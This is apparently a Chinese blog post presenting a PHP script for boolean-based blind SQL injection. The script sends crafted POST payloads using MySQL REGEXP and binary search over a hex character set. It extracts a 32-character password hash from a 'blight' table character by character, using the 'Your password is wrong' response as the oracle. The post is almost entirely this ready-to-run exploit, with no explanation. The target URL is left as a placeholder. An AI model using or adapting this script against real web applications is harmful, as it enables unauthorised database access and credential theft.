PHP正则表达式二分法实现mysql盲注脚本
$sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $sPost = 'inject=Inject&injection='; $sCharset = 'ABCDEF0123456789'; /* for every character */ for ($i=0, $hash=''; $i<32; ++$i) { $ch = $sCharset; do { $ch1 = substr($ch, 0, intval(strlen($ch)/2)); $ch2 = substr($ch, intval(strlen($ch)/2)); $p = $sPost.'absolutelyimpossible\' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$hash.'['.$ch1.']\' AND sessid=xxx) AND \'1\'=\'1'; $res = libHTTP::POST($sUrl, $p); if (strpos($res['content'], 'Your password is wrong') === false) $ch = $ch1; else $ch = $ch2; } while (strlen($ch) > 1); $hash .= $ch; echo "\rhash: ".$hash; }
从此山高路远,纵马扬鞭。愿往后旅途,三冬暖,春不寒,天黑有灯,下雨有伞。此生尽兴,不负勇往。
浙公网安备 33010602011771号